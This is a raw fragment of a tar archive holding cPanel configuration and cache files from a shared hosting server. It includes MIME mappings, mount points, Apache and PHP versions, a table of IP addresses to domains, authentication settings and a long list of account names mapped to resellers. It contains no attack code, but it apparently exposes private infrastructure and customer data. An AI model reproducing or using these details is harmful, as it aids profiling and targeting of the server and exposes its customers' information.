ufdl","image/vnd.fst":"fst","application/vnd.ms-powerpoint.slide.macroenabled.12":"sldm","application/vnd.spotfire.dxp":"dxp","application/wspolicy+xml":"wspolicy","application/vnd.hp-pcl":"pcl","image/ktx":"ktx","application/x-hdf":"hdf","application/vnd.epson.ssf":"ssf","application/vnd.dreamfactory":"dfac","application/vnd.yamaha.smaf-phrase":"spf","image/g3fax":"g3","application/vnd.mediastation.cdkey":"cdkey","application/vnd.fluxtime.clip":"ftc","application/vnd.jcp.javame.midlet-rms":"rms","application/vnd.amazon.ebook":"azw","application/vnd.frogans.ltf":"ltf","application/vnd.hal+xml":"hal","application/vnd.adobe.xdp+xml":"xdp","application/scvp-cv-response":"scs","font/woff2":"woff2","model/vrml":"vrml wrl","application/marc":"mrc","application/vnd.hp-jlyt":"jlt","video/vnd.ms-playready.media.pyv":"pyv","video/jpm":"jpgm jpm","application/vnd.businessobjects":"rep","application/x-ms-wmd":"wmd","application/vnd.muvee.style":"msty","application/vnd.intu.qfx":"qfx","application/vnd.tao.intent-module-archive":"tao","application/vnd.oasis.opendocument.text":"odt","application/vnd.accpac.simply.imp":"imp","audio/vnd.rip":"rip","application/vnd.kde.kword":"kwd kwt","font/otf":"otf","image/vnd.ms-photo":"wdp","application/vnd.yamaha.smaf-audio":"saf","application/vnd.ms-pki.seccat":"cat","application/x-httpd-ea-php55":"php php5","application/vnd.geogebra.file":"ggb","video/vnd.dece.video":"uvv uvvv","text/vnd.curl.dcurl":"dcurl","application/vnd.micrografx.flo":"flo","application/pics-rules":"prf","application/cdmi-domain":"cdmid","application/x-tex-tfm":"tfm","application/vnd.dynageo":"geo","application/vnd.ms-powerpoint.addin.macroenabled.12":"ppam","video/quicktime":"mov qt","application/vnd.shana.informed.interchange":"iif","application/rls-services+xml":"rs","application/x-httpd-ea-php80":"php php8","application/vnd.macports.portpkg":"portpkg","text/csv":"csv","application/vnd.immervision-ivu":"ivu","application/oda":"oda","application/vnd.chemdraw+xml":"cdxml","text/x-log":"log","application/scvp-cv-request":"scq","application/x-stuffit":"sit","application/vnd.triscape.mxs":"mxs","application/rtf":"rtf","video/x-sgi-movie":"movie","application/vnd.groove-tool-template":"tpl","application/x-tads":"gam","application/mets+xml":"mets","application/vnd.fujixerox.docuworks":"xdw","image/tiff":"tif tiff","application/x-tcl":"tcl","application/pskc+xml":"pskcxml","image/x-portable-graymap":"pgm","application/vnd.wt.stf":"stf","image/sgi":"sgi","application/x-subrip":"srt","application/vnd.hp-hpid":"hpid","text/x-uuencode":"uu","application/vnd.sus-calendar":"sus susp","application/vnd.umajin":"umj","application/vnd.3gpp2.tcap":"tcap","video/vnd.vivo":"viv","audio/x-caf":"caf","application/vnd.vcx":"vcx","model/mesh":"mesh msh silo","application/xv+xml":"mxml xhvml xvm xvml","application/vnd.pg.format":"str","application/vnd.quark.quarkxpress":"qwd qwt qxb qxd qxl qxt","application/x-msterminal":"trm","audio/x-wav":"wav","image/png":"png","application/x-httpd-ea-php71":"php php7","application/cdmi-container":"cdmic","text/prs.lines.tag":"dsc","application/vnd.iccprofile":"icc icm","text/x-fortran":"f f77 f90 for","application/x-bcpio":"bcpio","application/vnd.llamagraphics.life-balance.exchange+xml":"lbe","application/wsdl+xml":"wsdl","application/vnd.ezpix-album":"ez2","application/x-xz":"xz","application/vnd.ecowin.chart":"mag","image/x-portable-pixmap":"ppm","application/vnd.rig.cryptonote":"cryptonote","audio/adpcm":"adp","application/x-dvi":"dvi","text/css":"css","text/vbscript":"vbs","application/mp4":"mp4s","application/vnd.noblenet-sealer":"nns","application/ssml+xml":"ssml","application/x-msmetafile":"emf emz wmf wmz","application/vnd.kde.kformula":"kfo","application/vnd.3gpp.pic-bw-large":"plb","application/vnd.sun.xml.writer":"sxw","application/vnd.tmobile-livetv":"tmo","application/vnd.groove-identity-message":"gim","text/x-opml":"opml","application/vnd.fdf":"fdf","application/vnd.wap.wmlscriptc":".wmlsc wmlsc","application/oxps":"oxps","application/x-zmachine":"z1 z2 z3 z4 z5 z6 z7 z8","application/x-sv4crc":"sv4crc","x-conference/x-cooltalk":"ice","video/x-m4v":"m4v","video/vnd.dvb.file":"dvb","application/vnd.intercon.formnet":"xpw xpx","application/vnd.mfer":"mwf","application/docbook+xml":"dbk","application/vnd.cluetrust.cartomobile-config":"c11amc","application/vnd.yamaha.hv-dic":"hvd","application/vnd.lotus-notes":"nsf","application/vnd.kodak-descriptor":"sse","application/voicexml+xml":"vxml","application/pls+xml":"pls","application/x-glulx":"ulx","application/epub+zip":"epub","application/xspf+xml":"xspf","application/mediaservercontrol+xml":"mscml","application/xml":"xml xsl","application/vnd.uoml+xml":"uoml","video/x-ms-wvx":"wvx","application/vnd.lotus-organizer":"org","application/pkix-pkipath":"pkipath","image/vnd.dwg":"dwg","audio/x-matroska":"mka","application/vnd.trueapp":"tra","image/vnd.fastbidsheet":"fbs","application/vnd.osgeo.mapguide.package":"mgp","image/vnd.fpx":"fpx","application/vnd.openxmlformats-officedocument.presentationml.slideshow":"ppsx","image/x-cmu-raster":"ras","application/x-font-linux-psf":"psf","image/prs.btif":"btif","application/vnd.pmi.widget":"wg","application/vnd.nokia.radio-presets":"rpss","application/x-httpd-ea-php73":"php php7","application/vnd.oasis.opendocument.chart-template":"otc","application/vnd.crick.clicker.palette":"clkp","application/vnd.kinar":"kne knp","application/vnd.nokia.radio-preset":"rpst","application/java-vm":"class","application/cgi":"cgi","video/webm":"webm","application/vnd.llamagraphics.life-balance.desktop":"lbd","application/vnd.contact.cmsg":"cdbcmsg","image/x-icon":"ico","model/vnd.collada+xml":"dae","application/vnd.oasis.opendocument.presentation-template":"otp","model/x3d+xml":"x3d x3dz","text/vnd.in3d.spot":"spot","application/x-dtbncx+xml":"ncx","video/mp4":"mp4 mp4v mpg4","application/vnd.fdsn.mseed":"mseed","application/gxf":"gxf","application/vnd.airzip.filesecure.azs":"azs","application/vnd.shana.informed.package":"ipk","application/onenote":"onepkg onetmp onetoc onetoc2","application/vnd.semf":"semf","application/vnd.openxmlformats-officedocument.spreadsheetml.template":"xltx","application/vnd.spotfire.sfs":"sfs","application/x-font-pcf":"pcf","application/x-debian-package":"deb udeb","image/x-xwindowdump":"xwd","application/vnd.oasis.opendocument.graphics":"odg","application/json":"json","audio/x-pn-realaudio":"ra ram","application/x-blorb":"blb blorb","application/vnd.kde.kivio":"flw","application/vnd.ezpix-package":"ez3","text/vnd.in3d.3dml":"3dml","application/vnd.seemail":"see","application/vnd.ms-excel.template.macroenabled.12":"xltm","application/x-iso9660-image":"iso","application/vnd.ms-artgalry":"cil","application/vnd.dolby.mlp":"mlp","application/dssc+der":"dssc","application/applixware":"aw","application/vnd.koan":"skd skm skp skt","application/x-netcdf":"cdf nc","application/x-nzb":"nzb","application/x-gca-compressed":"gca","video/h264":"h264","application/vnd.adobe.fxp":"fxp fxpl","application/x-xliff+xml":"xlf","application/x-httpd-ea-php70":"php php7","application/vnd.micrografx.igx":"igx","application/vnd.mynfc":"taglet","application/x-mie":"mie","image/vnd.xiff":"xif","application/vnd.cloanto.rp9":"rp9","text/vnd.wap.wml":".wml wml","model/vnd.dwf":"dwf","application/x-futuresplash":"spl","application/vnd.data-vision.rdz":"rdz","application/vnd.yamaha.openscoreformat":"osf","application/mathematica":"ma mb nb","application/sbml+xml":"sbml","application/vnd.fujitsu.oasys3":"oa3","video/ogg":"ogv","application/x-texinfo":"texi texinfo","application/x-7z-compressed":"7z","application/vnd.kidspiration":"kia","application/vnd.nitf":"nitf ntf","application/vnd.unity":"unityweb","application/vnd.crick.clicker.keyboard":"clkk","application/x-gramps-xml":"gramps","application/vnd.irepository.package+xml":"irp","application/x-shockwave-flash":"swf","application/gml+xml":"gml","application/vnd.semd":"semd","application/pkix-attr-cert":"ac","application/perl":"perl pl plx pm ppl","application/vnd.oasis.opendocument.spreadsheet":"ods","application/vnd.antix.game-component":"atx","application/x-bzip":"bz tbz","application/vnd.groove-account":"gac","application/vnd.anser-web-funds-transfer-initiation":"fti","application/vnd.dvb.ait":"ait","application/pkcs8":"p8","application/vnd.fujitsu.oasysgp":"fg5","video/x-ms-wmx":"wmx","application/vnd.3m.post-it-notes":"pwn","application/vnd.sema":"sema","application/timestamped-data":"tsd","application/vnd.rn-realmedia-vbr":"rmvb","application/ipfix":"ipfix","text/richtext":"rtx","application/x-ace-compressed":"ace","application/xcap-diff+xml":"xdf","application/x-ustar":"ustar","text/x-pascal":"p pas","application/vnd.kenameaapp":"htke","application/vnd.kde.kchart":"chrt","application/vnd.lotus-approach":"apr","image/vnd.adobe.photoshop":"psd","application/vnd.ds-keypoint":"kpxx","application/vnd.openxmlformats-officedocument.presentationml.template":"potx","application/vnd.stardivision.calc":"sdc","video/vnd.dece.hd":"uvh uvvh","application/vnd.syncml.dm+xml":"xdm","application/vnd.sun.xml.math":"sxm","application/pdf":"pdf","application/vnd.kahootz":"ktr ktz","application/vnd.ms-excel":"xla xlc xlm xls xlt xlw","video/vnd.dece.sd":"uvs uvvs","application/set-registration-initiation":"setreg","application/font-tdpfr":"pfr","application/x-font-snf":"snf","application/vnd.ms-pki.stl":"stl","application/x-mspublisher":"pub","application/vnd.smart.teacher":"teacher","text/sgml":"sgm sgml","application/vnd.yamaha.hv-script":"hvs","text/calendar":"ics ifb","application/vnd.ibm.secure-container":"sc","application/vnd.stardivision.draw":"sda","application/vnd.mobius.daf":"daf","application/vnd.anser-web-certificate-issue-initiation":"cii","application/vnd.insors.igm":"igm","application/x-pkcs7-crl":".crl","application/pkcs7-signature":"p7s","application/vnd.pvi.ptid1":"ptid","audio/vnd.dece.audio":"uva uvva","audio/midi":"kar mid midi rmi","application/vnd.wap.wmlc":".wmlc wmlc","application/vnd.recordare.musicxml+xml":"musicxml","application/cdmi-queue":"cdmiq","application/andrew-inset":"ez","application/vnd.eszigno3+xml":"es3 et3","application/x-sv4cpio":"sv4cpio","audio/mpeg":"m2a m3a mp2 mp2a mp3 mpga","image/jpeg":"jpe jpeg jpg","application/vnd.criticaltools.wbs+xml":"wbs","audio/vnd.nuera.ecelp9600":"ecelp9600","application/vnd.3gpp.pic-bw-small":"psb","application/vnd.lotus-freelance":"pre","application/vnd.openxmlformats-officedocument.wordprocessingml.document":"docx","application/x-gtar":"gtar","chemical/x-csml":"csml","image/bmp":"bmp","application/x-msmoney":"mny","application/vnd.openxmlformats-officedocument.wordprocessingml.template":"dotx","application/vnd.cinderella":"cdy","application/javascript":"js","application/vnd.grafeq":"gqf gqs","application/vnd.publishare-delta-tree":"qps","application/vnd.geogebra.tool":"ggt","application/mac-binhex40":"hqx","application/vnd.svd":"svd","image/x-xpixmap":"xpm","application/vnd.is-xpr":"xpr","application/vnd.groove-injector":"grv","application/mac-compactpro":"cpt","application/vnd.accpac.simply.aso":"aso","application/vnd.ms-excel.sheet.macroenabled.12":"xlsm","application/vnd.mobius.txf":"txf","application/gpx+xml":"gpx","application/vnd.mozilla.xul+xml":"xul","audio/x-pn-realaudio-plugin":"rmp","font/collection":"ttc","application/vnd.audiograph":"aep","text/vnd.fmi.flexstor":"flx","application/vnd.geometry-explorer":"gex gre","application/vnd.lotus-1-2-3":"123","application/x-wais-source":"src","application/vnd.oasis.opendocument.text-web":"oth","application/mxf":"mxf","text/vnd.dvb.subtitle":"sub","text/cache-manifest":"appcache","model/vnd.gtw":"gtw","application/vnd.3gpp.pic-bw-var":"pvb","application/vnd.epson.msf":"msf","model/vnd.vtu":"vtu","application/vnd.crick.clicker":"clkx","text/plain":"conf def in list log text txt","application/vnd.dna":"dna","application/rpki-ghostbusters":"gbr","application/vnd.denovo.fcselayout-link":"fe_launch","text/x-java-source":"java","application/vnd.oasis.opendocument.formula":"odf","application/vnd.oma.dd2+xml":"dd2","application/vnd.mobius.dis":"dis","application/pkix-crl":"crl","application/x-tar":".tgz tar","application/x-chess-pgn":"pgn","audio/x-aiff":"aif aifc aiff","application/mathml+xml":"mathml","application/ecmascript":"ecma","application/vnd.wolfram.player":"nbp","application/vnd.oasis.opendocument.formula-template":"odft","application/vnd.palm":"oprc pdb pqa","application/vnd.acucorp":"acutc atc","model/vnd.mts":"mts","application/vnd.kde.kpresenter":"kpr kpt","application/pkcs10":"p10","text/vnd.wap.wmlscript":".wmls wmls","text/troff":"man me ms roff t tr","application/cdmi-object":"cdmio","audio/vnd.ms-playready.media.pya":"pya","application/x-dgc-compressed":"dgc","application/vnd.webturbo":"wtb","application/vnd.mcd":"mcd","application/vnd.ms-powerpoint.slideshow.macroenabled.12":"ppsm","application/vnd.openxmlformats-officedocument.presentationml.slide":"sldx","application/vnd.zul":"zir zirz","application/vnd.dpgraph":"dpg","image/vnd.fujixerox.edmics-rlc":"rlc","application/x-ms-application":"application","application/sparql-results+xml":"srx","application/vnd.ms-htmlhelp":"chm","model/x3d+binary":"x3db x3dbz","application/vnd.android.package-archive":"apk","application/x-tex":"tex","application/vnd.ibm.modcap":"afp list3820 listafp","application/vnd.mophun.certificate":"mpc","application/vnd.solent.sdkm+xml":"sdkd sdkm","application/vnd.flographit":"gph","application/x-authorware-bin":"aab u32 vox x32","application/vnd.adobe.air-application-installer-package+zip":"air","application/vnd.geoplan":"g2w","application/vnd.noblenet-directory":"nnd","application/x-eva":"eva","application/vnd.epson.esf":"esf","application/resource-lists+xml":"rl","application/x-gnumeric":"gnumeric","application/vnd.sun.xml.impress.template":"sti","application/x-mswrite":"wri","application/sdp":"sdp","audio/silk":"sil","application/x-httpd-ea-php72":"php php7","application/vnd.hp-pclxl":"pclxl","application/mbox":"mbox","application/zip":"zip","font/ttf":"ttf","application/vnd.acucobol":"acu","application/ssdl+xml":"ssdl","application/vnd.handheld-entertainment+xml":"zmm","chemical/x-cdx":"cdx","application/vnd.stepmania.package":"smzip","application/vnd.wordperfect":"wpd","audio/vnd.dts":"dts","model/iges":"iges igs","application/vnd.fuzzysheet":"fzs","message/rfc822":"eml mime","application/vnd.route66.link66+xml":"link66","audio/vnd.nuera.ecelp7470":"ecelp7470","application/dssc+xml":"xdssc","application/vnd.novadigm.edx":"edx","application/ccxml+xml":"ccxml","video/x-ms-vob":"vob","application/vnd.oasis.opendocument.database":"odb","application/vnd.gmx":"gmx","application/x-stuffitx":"sitx","application/vnd.visionary":"vis","application/vnd.sun.xml.impress":"sxi","audio/vnd.dts.hd":"dtshd","application/x-xfig":"fig","application/vnd.mobius.mqy":"mqy","application/vnd.groove-tool-message":"gtm","audio/vnd.digital-winds":"eol","application/vnd.ms-xpsdocument":"xps","video/mj2":"mj2 mjp2","application/x-ms-wmz":"wmz","video/x-msvideo":"avi","application/vnd.osgi.dp":"dp","application/java-serialized-object":"ser","application/vnd.previewsystems.box":"box","application/vnd.crick.clicker.template":"clkt","application/rdf+xml":"rdf","application/vnd.geonext":"gxt","model/vnd.gdl":"gdl","application/vnd.picsel":"efif","video/x-f4v":"f4v","application/hyperstudio":"stk","application/lost+xml":"lostxml","application/x-csh":"csh","application/oebps-package+xml":"opf","application/yin+xml":"yin","text/n3":"n3","application/vnd.intu.qbo":"qbo","application/srgs+xml":"grxml","application/vnd.apple.mpegurl":"m3u8","application/vnd.sun.xml.calc.template":"stc","application/vnd.nokia.n-gage.symbian.install":"n-gage","application/x-director":"cct cst cxt dcr dir dxr fgd swa w3d","application/vnd.ms-cab-compressed":"cab","application/x-msmediaview":"m13 m14 mvb","application/jsonml+json":"jsonml","application/vnd.mobius.mbk":"mbk","application/vnd.wqd":"wqd","application/vnd.amiga.ami":"ami","application/atomsvc+xml":"atomsvc","application/vnd.hp-hps":"hps","application/vnd.rim.cod":"cod","application/metalink+xml":"metalink","application/widget":"wgt","application/x-pkcs7-certificates":"p7b spc","application/x-rar-compressed":"rar","application/vnd.oasis.opendocument.spreadsheet-template":"ots","text/x-vcard":"vcf","application/vnd.hbci":"hbci","application/vnd.fdsn.seed":"dataless seed","application/set-payment-initiation":"setpay","application/vnd.joost.joda-archive":"joda","image/vnd.ms-modi":"mdi","application/vnd.yamaha.openscoreformat.osfpvg+xml":"osfpvg","application/vnd.ms-powerpoint":"pot pps ppt","text/uri-list":"uri uris urls","text/html":".shtml htm html shtml","application/atom+xml":"atom","application/vnd.ms-project":"mpp mpt","application/vnd.ms-wpl":"wpl","application/yang":"yang","application/vnd.curl.car":"car"} datastore/_Cpanel::Quota.pm__ajansonline 0000600 00000000103 15025306755 0014341 0 ustar 00 {"VERSION":"2.4","data":[4564525056,null,null,53885,200000,146115]} datastore/_usr_local_cpanel_cpanel_-F 0000600 00000000010 15025306756 0013755 0 ustar 00 vps,vps
datastore/_bin_gtar_--version 0000600 00000000470 15025306756 0012302 0 ustar 00 tar (GNU tar) 1.26
Copyright (C) 2011 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later .
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Written by John Gilmore and Jay Fenlason.
datastore/_opt_cpanel_ea-php74_root_usr_bin_php_-n_-v 0000600 00000000207 15025306756 0016774 0 ustar 00 PHP 7.4.33 (cli) (built: Sep 18 2024 17:19:02) ( NTS )
Copyright (c) The PHP Group
Zend Engine v3.4.0, Copyright (c) Zend Technologies
datastore/reseller_SORTEDRESELLERSUSERS_ajansonline 0000600 00000000312 15025306756 0016033 0 ustar 00 {"statusmsg":"Ran adminbin Cpanel/reseller/SORTEDRESELLERSUSERS","mode":"full","status":1,"version":"2.4","error":0,"exit_code":0,"data":[["ajansonline","ajansonline.com"]],"timeout":0,"action":"fetch"} datastore/MOUNTS_CACHE__proc_mounts 0000600 00000005241 15025306756 0013157 0 ustar 00 rootfs / rootfs rw 0 0
sysfs /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime,gid=1002,hidepid=2 0 0
devtmpfs /dev devtmpfs rw,nosuid,size=56620856k,nr_inodes=14155214,mode=755 0 0
securityfs /sys/kernel/security securityfs rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev 0 0
devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000 0 0
tmpfs /run tmpfs rw,nosuid,nodev,mode=755 0 0
tmpfs /sys/fs/cgroup tmpfs rw,nosuid,nodev,noexec,mode=755 0 0
cgroup /sys/fs/cgroup/systemd cgroup rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/usr/lib/systemd/systemd-cgroups-agent,name=systemd 0 0
pstore /sys/fs/pstore pstore rw,nosuid,nodev,noexec,relatime 0 0
cgroup /sys/fs/cgroup/freezer cgroup rw,nosuid,nodev,noexec,relatime,freezer 0 0
cgroup /sys/fs/cgroup/net_cls,net_prio cgroup rw,nosuid,nodev,noexec,relatime,net_prio,net_cls 0 0
cgroup /sys/fs/cgroup/beancounter cgroup rw,nosuid,nodev,noexec,relatime,beancounter 0 0
cgroup /sys/fs/cgroup/pids cgroup rw,nosuid,nodev,noexec,relatime,pids 0 0
cgroup /sys/fs/cgroup/memory cgroup rw,nosuid,nodev,noexec,relatime,memory 0 0
cgroup /sys/fs/cgroup/blkio cgroup rw,nosuid,nodev,noexec,relatime,blkio 0 0
cgroup /sys/fs/cgroup/cpuset cgroup rw,nosuid,nodev,noexec,relatime,cpuset 0 0
cgroup /sys/fs/cgroup/ve cgroup rw,nosuid,nodev,noexec,relatime,ve 0 0
cgroup /sys/fs/cgroup/hugetlb cgroup rw,nosuid,nodev,noexec,relatime,hugetlb 0 0
cgroup /sys/fs/cgroup/cpu,cpuacct cgroup rw,nosuid,nodev,noexec,relatime,cpuacct,cpu 0 0
cgroup /sys/fs/cgroup/devices cgroup rw,nosuid,nodev,noexec,relatime,devices 0 0
cgroup /sys/fs/cgroup/perf_event cgroup rw,nosuid,nodev,noexec,relatime,perf_event 0 0
configfs /sys/kernel/config configfs rw,relatime 0 0
/dev/sda2 / ext4 rw,relatime,data=ordered,jqfmt=vfsv1,usrjquota=quota.user 0 0
systemd-1 /proc/sys/fs/binfmt_misc autofs rw,relatime,fd=36,pipe_ino=32201,pgrp=1,timeout=0,minproto=5,maxproto=5,direct,pipe_ino=32201 0 0
hugetlbfs /dev/hugepages hugetlbfs rw,relatime 0 0
mqueue /dev/mqueue mqueue rw,relatime 0 0
debugfs /sys/kernel/debug debugfs rw,relatime 0 0
fusectl /sys/fs/fuse/connections fusectl rw,relatime 0 0
/dev/sdc1 /home2 ext4 rw,relatime,data=ordered,jqfmt=vfsv1,usrjquota=quota.user 0 0
/dev/sdb1 /home ext4 rw,relatime,data=ordered,jqfmt=vfsv1,usrjquota=quota.user 0 0
sunrpc /var/lib/nfs/rpc_pipefs rpc_pipefs rw,relatime 0 0
/dev/loop0 /tmp ext4 rw,nosuid,noexec,relatime,discard,data=ordered 0 0
/dev/loop0 /var/tmp ext4 rw,nosuid,noexec,relatime,discard,data=ordered 0 0
binfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw,relatime 0 0
tmpfs /run/user/0 tmpfs rw,nosuid,nodev,relatime,size=11326328k,mode=700 0 0 datastore/_usr_sbin_httpd_-V 0000600 00000001546 15025306756 0012214 0 ustar 00 Server version: Apache/2.4.62 (cPanel)
Server built: Jul 22 2024 15:25:25
Server's Module Magic Number: 20120211:134
Server loaded: APR 1.7.5, APR-UTIL 1.6.3, PCRE 8.32 2012-11-30
Compiled using: APR 1.7.4, APR-UTIL 1.6.3, PCRE 8.32 2012-11-30
Architecture: 64-bit
Server MPM:
Server compiled with....
-D APR_HAS_SENDFILE
-D APR_HAS_MMAP
-D APR_HAVE_IPV6 (IPv4-mapped addresses disabled)
-D APR_USE_SYSVSEM_SERIALIZE
-D APR_USE_PTHREAD_SERIALIZE
-D SINGLE_LISTEN_UNSERIALIZED_ACCEPT
-D APR_HAS_OTHER_CHILD
-D AP_HAVE_RELIABLE_PIPED_LOGS
-D DYNAMIC_MODULE_LIMIT=256
-D HTTPD_ROOT="/etc/apache2"
-D SUEXEC_BIN="/usr/sbin/suexec"
-D DEFAULT_PIDLOG="/var/run/apache2/httpd.pid"
-D DEFAULT_SCOREBOARD="logs/apache_runtime_status"
-D DEFAULT_ERRORLOG="logs/error_log"
-D AP_TYPES_CONFIG_FILE="conf/mime.types"
-D SERVER_CONFIG_FILE="conf/httpd.conf"
caches/config/_etc_domainips___default_colon_with_one_space 0000600 00000000267 15025306756 0020410 0 ustar 00 {"213.238.179.53":"doktoraziz.com","213.238.179.44":"s2.basement.ist","217.195.207.111":"tolgakalafat.com.tr","213.238.181.186":"dogruoz.com","45.200.120.223":"otomobilfiyatlari.net"} caches/config/_etc_cpanel_ea4_paths.conf___default_equal_space_seperated_config 0000600 00000001335 15025306756 0024222 0 ustar 00 {"dir_run":"/run/apache2","dir_docroot":"/var/www/html","file_conf_mime_types":"/etc/apache2/conf/mime.types","bin_httpd":"/usr/sbin/httpd","dir_modules":"/etc/apache2/modules","dir_base":"/etc/apache2","dir_conf_userdata":"/etc/apache2/conf.d/userdata","bin_suexec":"/usr/sbin/suexec","bin_apachectl":"/usr/local/lsws/bin/lswsctrl","dir_domlogs":"/etc/apache2/logs/domlogs","dir_logs":"/etc/apache2/logs","file_access_log":"/etc/apache2/logs/access_log","dir_conf_includes":"/etc/apache2/conf.d/includes","file_conf_php_conf":"/etc/apache2/conf.d/php.conf","file_conf":"/etc/apache2/conf/httpd.conf","dir_conf":"/etc/apache2/conf.d","file_error_log":"/etc/apache2/logs/error_log","file_conf_srm_conf":"/etc/apache2/conf.d/srm.conf"} caches/config/_etc_sysconfig_authconfig___default 0000600 00000001137 15025306756 0016374 0 ustar 00 {"USEPAMACCESS":"no","USESYSNETAUTH":"no","USEKERBEROS":"no","USEECRYPTFS":"no","WINBINDKRB5":"no","FORCESMARTCARD":"no","IPAV2NONTP":"no","USELOCAUTHORIZE":"yes","USEPASSWDQC":"no","USELDAPAUTH":"no","USEWINBIND":"no","USEDB":"no","USELDAP":"no","USEMKHOMEDIR":"no","USEWINBINDAUTH":"no","FORCELEGACY":"no","USEHESIOD":"no","CACHECREDENTIALS":"yes","FAILLOCKARGS":"\"deny=4 unlock_time=1200\"","USESSSDAUTH":"no","USESMARTCARD":"no","USENIS":"no","IPADOMAINJOINED":"no","USESSSD":"yes","PASSWDALGORITHM":"sha512","USEIPAV2":"no","USESHADOW":"yes","USEFPRINTD":"yes","USEFAILLOCK":"no","USEPWQUALITY":"yes"} caches/config/_etc_trueuserowners___default_colon_with_one_space 0000600 00000054542 15025306757 0021547 0 ustar 00 {"neva":"vegoseco","dilanaydin":"wemedyan","hsstorperde":"yazilimsistemler","projekku":"root","doramet":"teskonpr","umutcanm":"root","aksazbal":"root","demirkoycekici":"dijitald","senpaslanmaz":"morgraf1","intisadtv":"eroltasgin","tedmuzik":"teskonpr","fsinsaat":"vegoseco","elektromarketcim":"suvakhostt","acikhats":"yazilimplus","kartalanaokulun":"yazilimsistemler","cecsite":"s2rrhdeq","maltepegunlukkir":"yazilimsistemler","ebeveynn":"jetturkc","pubguchile":"teknodiyari","farukankara":"sametwhq","ytednizin":"denizin","doctoremsaglikgu":"savasder","estambu4":"root","isimanalizi":"vasitbmy","miraserviscom":"sametwhq","byargiyim":"teskonpr","selincalik":"s2rrhdeq","doguserh":"root","mergenapart":"keyfinyerinegels","cakmakmuhendis":"yazilimsistemler","cosmeticsds":"kozmotgx","doganerc":"root","galipdrv":"root","maltepekonaklama":"yazilimsistemler","empirehealthhaar":"empirehe","foursevenbespoke":"teskonpr","eksonnet":"root","aghcimbo":"root","brgmblsm":"bergamab","ruzgargarage":"yazilimsistemler","derinumutmermer":"yazilimsistemler","gurlerem":"root","masterakademi":"morgraf1","ekonomihaber":"cemoli35","yasamikl":"root","teknodiyari":"teknodiyari","stormsailing2":"kozmotgx","haliltek01":"sametwhq","semsatekstil":"semsatekstil","hfirsat":"cicek","tauruuha":"root","ledkasalar":"deepexay","windsorsiber":"vulnerda","gonuldendile":"root","kptseypq":"root","yazjewellery":"kozmotgx","empirehealthbrai":"empirehe","biroglubaklavaqr":"gramaxcom","turhalkombiservi":"sametwhq","lezzetlersofrasi":"deepexay","istecilek":"mustafacan","merveboycom":"yazilimsistemler","etapteknik":"sametwhq","servisyetkili":"teskonpr","areayonetim":"morgraf1","onlineservistale":"sametwhq","pozitifid":"microtag","sedatustam":"sametwhq","naturalgidalar":"deepexay","revanita":"root","ibrahimh":"root","pvctutka":"vegoseco","cokcilek":"mustafacan","chaavaworld":"mustafaca","abakusglobaltrad":"morgraf1","xpturnrs":"root","konseptpark":"visuald","ogulbatt":"root","mustafaelibol":"root","empirehealtheye":"empirehe","cekmekoy":"root","nehirhobi":"bilecnrb","burakgormus":"xnbfbx","vulnerda":"vulnerda","pastanemeyvesi":"mustafacan","bayihosting":"fatihsup","parav":"eroltasgin","germandubaistart":"morgraf1","leventhataytr":"morgraf1","karakascitcom":"vulnerda","inomec":"teskonpr","alfadenklikco":"vegoseco","kartalay":"root","vokalmimarlik":"simaleya","thenovaproject":"teskonpr","jetskorx":"root","ozermakina":"teskonpr","stormsailing":"kozmotgx","hmjgloba":"morgraf1","kayalarkoltukyik":"yazilimsistemler","elit":"root","ozakinku":"root","rullasar":"root","annegram":"jetturkc","spreskco":"root","sigortamfirst":"yazilimsistemler","paspartu":"cicek","uscevre":"teskonpr","fatihsude":"gramaxcom","samsunay":"root","golgeyazarlik":"golgeyazarlar","kfkmetalcomtr":"yazilimsistemler","guven":"cicek","canpvcco":"root","bellopkk":"root","avcoskunuzercom":"savasder","pistolturkiye":"visuald","empirehealthdent":"empirehe","deepexay":"deepexay","baybread":"root","hayatdental":"yazilimsistemler","gurdeniz":"teskonpr","beymarmetal":"bilecnrb","bridgestr":"s2rrhdeq","artuway":"mustafaca","nsnicestay":"vulnerda","esteborncomtr":"yazilimsistemler","ercihat":"fskhost1","doctoremplus":"savasder","alpergultekincom":"yazilimsistemler","bien":"cicek","gokhanyildizsigo":"savasder","kozmotgx":"kozmotgx","alphaotel":"keyfinyerinegels","cengifxb":"root","hatayelzem":"socialgu","carecrof":"root","chopemdown":"s2rrhdeq","rentusahomekozmo":"kozmotgx","cosmonicom":"visuald","nargrafi":"root","u0369586":"root","indir":"denizin","gunlukevkiralik":"keyfinyerinegels","volkan":"teskonpr","ekonomil":"tamerlojistik","gcqdorya":"morgraf1","shopserafin":"vegoseco","dragosanaok":"yazilimsistemler","abdullaharslan":"simaleya","oguzturhan":"bilecnrb","otomobil":"root","demo":"vegoseco","kibrisemlak":"morgraf1","ayvibe":"simaleya","nafiz":"byistanb","istanbulavukatim":"root","takipcikas":"canbuaxt","reyvo":"teskonpr","doktorun":"morgraf1","matsevyayincilik":"root","temyazil":"root","mertotokartal":"yazilimsistemler","bungorize":"byistanb","ekinozuhaber":"vegoseco","turfantarimsal":"morgraf1","teknoujm":"root","huseybww":"root","gelsinabout":"denizin","lineartcamping":"wemedyan","t2y":"bergamab","tethysjournal":"root","piknonef":"root","ambersenocak":"morgraf1","ballstapizzeria":"gramaxcom","yetkili":"teskonpr","evakozme":"root","emkdovmecom":"vulnerda","yesilnokta":"vegoseco","inteshar":"s2rrhdeq","vozoller":"yazilimplus","drcanerb":"root","mfmgrup":"teskonpr","cpmfenbi":"morgraf1","akmanlarconta":"teskonpr","maltepeavukat":"sedefahs","genus":"cicek","nuryemekcom":"vulnerda","mertskzk":"root","uzmanrefrakter":"bufamaco","cozum16":"sametwhq","benoircosmetics":"kozmotgx","orayagi2":"root","vgbondcom":"wemedyan","melihayhan":"wemedyan","clprocen":"root","falimfms":"root","httpseds":"root","rasittasarim":"rasittasarim","evdenev3":"root","acilakuservis":"vasitbmy","fqnunite":"morgraf1","erdcelik":"root","eryuce":"simaleya","cleanerstool":"bestprof","tarlavqv":"root","metropoletcom":"